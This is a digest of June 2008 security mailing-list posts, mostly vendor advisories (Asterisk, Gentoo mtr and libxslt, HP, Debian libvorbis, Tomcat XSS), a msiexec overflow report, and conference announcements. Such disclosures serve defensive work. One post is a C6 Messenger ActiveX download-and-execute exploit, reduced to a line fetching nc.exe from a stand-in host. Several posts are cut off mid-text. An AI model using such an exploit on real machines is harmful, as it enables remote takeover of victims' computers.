AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

[Asterisk Security Team]

   Asterisk Project Security Advisory - AST-2008-008

   ++
   |  Product   | Asterisk  |
   |+---|
   |  Summary   | Remote Crash Vulnerability in SIP channel driver  |
   || when run in pedantic mode |
   |+---|
   | Nature of Advisory | Denial of Service |
   |+---|
   |   Susceptibility   | Remote Unauthenticated Sessions   |
   |+---|
   |  Severity  | Critical  |
   |+---|
   |   Exploits Known   | No|
   |+---|
   |Reported On | May 8, 2008   |
   |+---|
   |Reported By | Hooi Ng (bugs.digium.com user hooi)   |
   |+---|
   | Posted On  | May 8, 2008   |
   |+---|
   |  Last Updated On   | June 3, 2008  |
   |+---|
   |  Advisory Contact  | Joshua Colp <[EMAIL PROTECTED]>|
   |+---|
   |  CVE Name  | CVE-2008-2119 |
   ++

   ++
   | Description | During pedantic SIP processing the From header value is  |
   | | passed to the ast_uri_decode function to be decoded. In  |
   | | two instances it is possible for the code to cause a |
   | | crash as the From header value is not checked to be  |
   | | non-NULL before being passed to the function.|
   ++

   ++
   | Resolution | The From header value is now copied into a buffer before  |
   || being passed to the ast_uri_decode function if pedantic   |
   || is enabled and in another instance it is checked to be|
   || non-NULL before being passed. |
   ++

   ++
   |   Affected Versions|
   ||
   |Product|  Release   |   |
   |   |   Series   |   |
   |---++---|
   | Asterisk Open Source  |   1.0.x| All versions  |
   |---++---|
   | Asterisk Open Source  |   1.2.x| All versions prior to |
   |   || 1.2.29|
   |---++---|
   | Asterisk Open Source  |   1.4.x| Not Affected  |
   |---++---|
   |   Asterisk Business Edition   |   A.x.x| All versions  |
   |---++---|
   |   Asterisk Business Edition   |   B.x.x| All versions prior to |
   |   || B.2.5.3   |
   |---++---|
   |   Asterisk Business Edition   |   C.x.x| Not Affected  |
   |---++---|
   |  AsteriskNOW  |   1.0.x| Not Affected  |
   |---++---|
   | Asterisk Appliance Developer  |   0.x.x| Not Affected  |
   |  Kit  ||   |
   |---

AccessMe Tool Release

[Oliver Lavery]

Hello, 

Security Compass is proud to announce the release of AccessMe, the latest
addition to our ExploitMe series of free penetration testing add-ons for
Mozilla Firefox.

This preliminary release of AccessMe expands the series with powerful
functionality for testing the access control and session management
mechanisms of web applications,  including:

- Invalid HTTP method attacks
- Bypassing access control using HTTP HEAD
- Session dropping

We're releasing this tool as open-source under the GPLv3, and hope they will
assist penetration testers, QA staff, and developers detect and eliminate
common security vulnerabilities in today's web applications.

Please visit http://www.securitycompass.com/ to download AccessMe, and all
of our other free penetration testing tools.

Regards,
Oliver Lavery
Security Compass

[NSG 03-06-2008] C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit

[ipsdix]

http://yoursite.com/nc.exe";>

 

London DEFCON June meet - DC4420 - Thursday 5th June

[Major Malfunction]

hey all,

it's that time of the month again!

so we present to you : DC4420 June @ the Glassblower:

- Wargames!

   The Winning team will be presenting 'how they did it' - 
(note:everyone should buy them Guinness. Schwag will be awarded as well)


- Last-minute hastily-put-together presentation on locks.
  autom8ton - bring your locks/picks and we'll have a workshop afterwards.

-  New speaker! Alex talking about Social engineering

- 5 minute slot - a demo by Richard. (demo is such a lovely term for a 
talk, could be anything!)


- MM will be calling for participation in an "art" project. If you have 
camera equipment, film making skills, editing skills, music/dubbing 
skills, please step forward! This is going to be fun, and to do with 
RFID. It's entitled "PARFID: Passive Aggressive RFID. RFIDIOts fight back!".


Also, please get in touch with me or alien if you would like to talk at 
the July meeting, June is now full :-)


There will be workshops after the talks - please bring locks + picks if 
you have them (and are legally entitled to carry them!) :P


Where?

Upstairs @ Glassblower 
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr

42 Glasshouse St, Piccadilly, W 1B 5JY

doors open from 7, speaking starts from  7.30 - please try and be prompt 
as some people need to go early to get trains back out of London.


we have private use of the whole of the upstairs till close.

real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 
'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, 
Leffe. even more stuff on draught : Becks, Fosters, 1664


food menu is extensive and most importantly : they do Pie.

as always, details & discussions here:

  http://dc4420.org

cheers,
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

[ GLSA 200806-01 ] mtr: Stack-based buffer overflow

[Tobias Heinlein]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200806-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: mtr: Stack-based buffer overflow
  Date: June 03, 2008
  Bugs: #223017
ID: 200806-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A stack-based buffer overflow was found in mtr, possibly resulting in
the execution of arbitrary code.

Background
==

mtr combines the functionality of the 'traceroute' and 'ping' programs
in a single network diagnostic tool.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-analyzer/mtr  < 0.73-r1>= 0.73-r1

Description
===

Adam Zabrocki reported a boundary error within the split_redraw()
function in the file split.c, possibly leading to a stack-based buffer
overflow.

Impact
==

A remote attacker could use a specially crafted resolved hostname to
execute arbitrary code with root privileges. However, it is required
that the attacker controls the DNS server used by the victim, and that
the "-p" (or "--split") command line option is used.

Workaround
==

There is no known workaround at this time.

Resolution
==

All mtr users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/mtr-0.73-r1"

References
==

  [ 1 ] CVE-2008-2357
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2357

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200806-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature

RE: Windows Installer msiexec GUID Buffer Overflow

[Thor (Hammer of God)]

So, the "possible code execution" would run code in the context of the user who 
was running msiexec.exe?  If you are going to get them to run code to exploit 
the "vulnerability," wouldn't it be more efficient to just get them to run 
whatever resultant code you were trying to run in the first place?

t

> -Original Message-
> From: Patrick Webster [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 03, 2008 3:13 AM
> To: bugtraq@securityfocus.com
> Subject: Windows Installer msiexec GUID Buffer Overflow
> 
> aushack.com - Vulnerability Advisory
> ---
> Release Date:
>  03-Jun-2008
> 
> Software:
>  Microsoft Corporation - Windows Installer (msiexec.exe)
>  http://www.microsoft.com/
> 
>  "Microsoft Windows Installer is an installation and configuration
> service that
>   reduces the total cost of ownership. Windows Installer enables
> customers to
>   provide better corporate deployment and provides a standard format
> for
>   component management."
> 
> Versions tested:
>  4.5.6001.22159 and 3.1.4000.1823 are vulnerable.
>  Other versions are untested but assumed.
> 
> Vulnerability discovered:
> 
>  Unicode based stack overflow.
> 
> Vulnerability impact:
> 
>  Moderate - Code execution is possible but difficult due to the unicode
>   conversion. Some ActiveX controls pass the GUID, so it may
>   be exploited remotely. Other avenues may also be present.
> 
> Vulnerability information:
> 
>  By specifying an overly long Globally Uniquie Identifier (GUID),
>  it is possible to overwrite the stack and SE Handler.
> 
>  Example:
> 
>   msiexec.exe /x {}
> 
> References:
>  aushack.com advisory
>  http://www.aushack.com/200806-msiexec.txt
> 
> Credit:
>  Patrick Webster ( [EMAIL PROTECTED] )
> 
> Disclosure timeline:
>  03-Jun-2008 - Disclosure.
> 
> EOF

[ GLSA 200806-02 ] libxslt: Execution of arbitrary code

[Tobias Heinlein]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200806-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libxslt: Execution of arbitrary code
  Date: June 03, 2008
  Bugs: #222499
ID: 200806-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability was found in libxslt, possibly resulting in the
execution of arbitrary code and Denial of Service.

Background
==

Libxslt is the XSLT C library developed for the GNOME project. XSLT
itself is an XML language to define transformations for XML.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  dev-libs/libxslt  < 1.1.24  >= 1.1.24

Description
===

Anthony de Almeida Lopes reported a vulnerability in libxslt when
handling XSL style-sheet files, which could be exploited to trigger the
use of uninitialized memory, e.g. in a call to "free()".

Impact
==

A remote attacker could entice a user or automated system to process an
XML file using a specially crafted XSL transformation file, possibly
resulting in the execution of arbitrary code or a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libxslt users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24"

References
==

  [ 1 ] CVE-2008-1767
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1767

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200806-02.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature

Re: Windows Installer msiexec GUID Buffer Overflow

[0xjbrown41]

Other flags may be vulnerable as well. Microsoft has a thing for unicode.

[security bulletin] HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01362558
Version: 1

HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, 
Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-06-02
Last Updated: 2008-06-02

Potential Security Impact: Remote execution of arbitrary code. 

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP StorageWorks 
Storage Mirroring (SWSM) software. This vulnerability could allow remote 
execution of arbitrary code. 

References: CVE-2008-1661. 

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StorageWorks Storage Mirroring software v4.5 Service Pack 1. 

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-1661 (AV:N/AC:M/Au:N/C:C/I:C/A:C)  9.3
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
CVSS 2.0 Base Metrics 


The Hewlett-Packard Company thanks Titon of BastardLabs working with 
TippingPoint's Zero Day Initiative for reporting this vulnerability to [EMAIL 
PROTECTED]

RESOLUTION

To resolve this vulnerability download HP StorageWorks Storage Mirroring 
software v4.5 Service Pack 2 (SP2) from Double-Take at the following URL: 
http://www.doubletake.com/products/double-take/default.aspx 

Note: Double-Take v5.0 (HP StorageWorks Storage Mirroring software v5.0) is now 
available for download from the above URL; this version includes the resolution 
to the stated vulnerability as well as a broad range of new features and 
improvements. 


PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 2 June 2008 Initial release 

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement."

©Copyright 2008 Hewlett-Packard Development Company, L.P.

[SECURITY] [DSA 1591-1] New libvorbis packages fix several vulnerabilities

[Thijs Kinkhorst]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1591-1  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
June 03, 2008 http://www.debian.org/security/faq
- 

Package: libvorbis
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-1419 CVE-2008-1420 CVE-2008-1423
Debian Bug : 482518

Several local (remote) vulnerabilities have been discovered in libvorbis,
a library for the Vorbis general-purpose compressed audio codec. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-1419

libvorbis does not properly handle a zero value which allows remote
attackers to cause a denial of service (crash or infinite loop) or
trigger an integer overflow.

CVE-2008-1420

Integer overflow in libvorbis allows remote attackers to execute
arbitrary code via a crafted OGG file, which triggers a heap overflow.

CVE-2008-1423

Integer overflow in libvorbis allows remote attackers to cause a denial
of service (crash) or execute arbitrary code via a crafted OGG file
which triggers a heap overflow.

For the stable distribution (etch), these problems have been fixed in version
1.1.2.dfsg-1.4.

For the unstable distribution (sid), these problems have been fixed in
version 1.2.0.dfsg-3.1. 

We recommend that you upgrade your libvorbis package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.dsc
Size/MD5 checksum:  787 2f0bfd28fb368c43c56332e7de7a2e3d
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg.orig.tar.gz
Size/MD5 checksum:  1312540 44cf09fef7f78e7c6ba7dd63b6137412
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.diff.gz
Size/MD5 checksum:15782 62527e6adcff1dca42018a0252b19b91

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:94500 edb2728b48cd6fc0357f62a7dc8fca5c
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:   110468 8273babee8a08c373671b468469b2ede
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:19202 925dfba3f212e8b69c760c433b119716
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_alpha.deb
Size/MD5 checksum:   494958 0052fe78f4be43cb9a7f42ea2b25f7fe

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:17790 f49da89a8b972614687f3a5e2f6c5bac
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:93498 241499415b96f3e348d1ec9c66a45981
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:   101508 63e1e8392876a822dc664e21b19e0185
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_amd64.deb
Size/MD5 checksum:   468670 8c6c80eb7b8e7f8b49be1447357ebce1

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:75744 03dad28341cde24fbbfd20444bf346c2
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:18528 508cb939f65a367447c44add9dd8c11a
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:98190 a09c2d3021f7b9d2d9b2bf04b2d30957
  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_arm.deb
Size/MD5 checksum:   458578 6dcadbb28c56a0a9368bfcd67b28d3fa

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_hppa.deb
Size/MD5 checksum:   483196 0435784553fb2b9c08c915da58c3c7e1
  
http://security.debian.org/pool/updates/main/libv/libv

Windows Installer msiexec GUID Buffer Overflow

[Patrick Webster]

aushack.com - Vulnerability Advisory
---
Release Date:
 03-Jun-2008

Software:
 Microsoft Corporation - Windows Installer (msiexec.exe)
 http://www.microsoft.com/

 "Microsoft Windows Installer is an installation and configuration service that
  reduces the total cost of ownership. Windows Installer enables customers to
  provide better corporate deployment and provides a standard format for
  component management."

Versions tested:
 4.5.6001.22159 and 3.1.4000.1823 are vulnerable.
 Other versions are untested but assumed.

Vulnerability discovered:

 Unicode based stack overflow.

Vulnerability impact:

 Moderate - Code execution is possible but difficult due to the unicode
conversion. Some ActiveX controls pass the GUID, so it may
be exploited remotely. Other avenues may also be present.

Vulnerability information:

 By specifying an overly long Globally Uniquie Identifier (GUID),
 it is possible to overwrite the stack and SE Handler.

 Example:

  msiexec.exe /x {}

References:
 aushack.com advisory
 http://www.aushack.com/200806-msiexec.txt

Credit:
 Patrick Webster ( [EMAIL PROTECTED] )

Disclosure timeline:
 03-Jun-2008 - Disclosure.

EOF

[SECURITY] CVE-2008-1947: Tomcat host-manager XSS vulnerability

[Mark Thomas]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2008-1947: Tomcat host-manager XSS vulnerability

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 5.5.9 to 5.5.26
Tomcat 6.0.0 to 6.0.16
This issue has been fixed in the source repositories for each version and
will be included in 5.5.27 and 6.0.17. It is anticipated that these
versions will be released shortly.

Description:
The user supplied hostname attribute is not filtered before being included
in the output.

Mitigation:
Do not visit untrusted sites whilst logged in to the host-manager
application and log out (close the browser) once finished with the
host-manager.

Example:
Assume that after logged in, the victim was lead to the malicious web
server with following file installed.
http://localhost:8080/host-manager/html/add"; method="get">
~  
~  
~  


Credit:
These issues were discovered by Petr Splichal of RedHat.

References:
http://tomcat.apache.org/security.html

Mark Thomas
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkhEahEACgkQb7IeiTPGAkOQggCgirNfHSCkMDhcEzG6Ig1N0WzP
qesAoKXePHeBKaB0VzeBoowW5kvZpBQx
=4nQe
-END PGP SIGNATURE-

Advisory: Xerox Workaround & planned patch

[suzanne . hawley]

Note:

Xerox has released a minimal-impact workaround for this issue for DocuShare 
4.x, 5.x, and 6.x. 


The workaround is detailed at 


https://docushare.xerox.com/doug/dsweb/View/Collection-7503 


We will also be releasing a patch to restore full functionality. Please refer 
to the above collection, or use your DocuShare support contact, for further 
information. 


Thank you to Doz and HackersCenter for finding and reporting this issue. 


Leigh L. Klotz, Jr. 

Xerox Corporation


(Submitted by S.Hawley, Xerox)

DEFCON 16 Updates - Get involved!

[The Dark Tangent]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

DEFCON 16 Updates!

As DEFCON 16 gets closer its awesome powers, much like a kraken summoned by
Dethklok, continues to grow.

How do you become friends with a kraken? You get to know it. Have a beer.
Below are various way you can get involved with DEFCON 16 contests and
events. The Call for Papers is closed, and selections are being announced
all this week, so it is a bit too late to speak, but not too late to get
involved.
https://www.defcon.org/html/defcon-16/dc-16-speakers.html

Artwork Contest:
Artwork Contest is now underway! The first batch of submissions is up at:
https://pics.defcon.org/showgallery.php?cat=532 

Entries will be posted as they are received, and will be accepted through
June 15th. There will then be a vote on pics.defcon.org for the viewers
choice award. You must to have a forums/pics account to vote, so go sign up!
The Official rules, prizes, and entry information can be found at:
http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html

Black and White Ball:
A Call for Talent, DJs, and Bands has been issued by the organizers of the
B&W Ball, which you may find at:
https://forum.defcon.org/showthread.php?t=9266
There is also currently discussion on the DEFCON Forums about a new theme
for the B&W Ball, which you can find on this thread:
https://forum.defcon.org/showthread.php?t=9142

Capture the Flag
Quals for this year's CTF qualifications are complete.. check out the
results here:
https://forum.defcon.org/forumdisplay.php?f=356 
http://www.kenshoto.com/

LosT @ Con Mystery Challenge:
LosT is working his devious magic again with the LosT @ Con Mystery
Challenge! There is a Pre-Reg Challenge currently open, and you can find
instructions at:
https://forum.defcon.org/showthread.php?t=9357.  
http://www.mysterychallenge.org

New for DEFCON 16

Buzzword Survivor:
New Contest for DEFCON 16.  Check out discussion of this contest as it
develops at https://forum.defcon.org/forumdisplay.php?f=352

Hardware Hacking Village:
To state it most simply, it's a way to give all the Defcon attendees that
like electronics a place to play. It's also intended to be a place for
everyone that thinks "Wow! That looks cool! I wish I knew how to do that!".
It's also going to be the headquarters for Joe Grand (kingpin) so he can
talk about hacking past badges and such. It should be a great place to hang
out. Find more info on the forums at
https://forum.defcon.org/showthread.php?t=9295.

The Race to Zero:
This one is generating a whole lot of buzz in the press. The Race to Zero
involves contestants being given a sample set of viruses and malcode to
modify and upload through the contest portal. The portal passes the modified
samples through a number of antivirus engines and determines if the sample
is a known threat. The first team or individual to pass their sample past
all antivirus engines undetected wins that round. Each round increases in
complexity as the contest progresses. Further details are available here:
http://www.racetozero.net/

And let's not forget the Gringo Challenge, DEF CON B0TS, Lockpick village, a
new Hardware Hacking Village, and more. Check it all out at:

DEFCON Website:
https://www.defcon.org/

Forums and Blogs
https://forum.defcon.org/

Follow the RSS feed:
https://www.defcon.org/defconrss.xml

Follow the announcements before, during, and after with twitter:
http://www.twitter.com/defcon16


-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.7.0 (Build 1012)
Charset: us-ascii

wsBVAwUBSESGHw6+AoIwjTCUAQjPXQf/Yqbb2kbmJMuwnh1sJXt0S/jFDAA5f2H2
MxzguQRKWlljBwmivMXACjYzibryK0Nb6GnpsS7OAtJWZupxSeVZ5DfXkJldaLPQ
CS6EqmfB8nStg74/PIlB3jhiCUOYcrDdd9+9K2HdN1dD44bNU4ZL6BS2aChpTm4y
RowRHBpv0BQFyi1UWpDXbGmQ99Ccinis/YDQNjGgKadcbTTD8ZQkgT++L82jrpef
9eOyYkRg8gOkuMgngx2ZASi/iRaodRA+2MZl4/SVDbm+tCjaQbRYjdaQh0NrJEM/
JssYWbYVOzuixtOV5nfn+k8nZ+08rTRv/TrAO2XegQKhJrQoaQjT+g==
=n5kj
-END PGP SIGNATURE-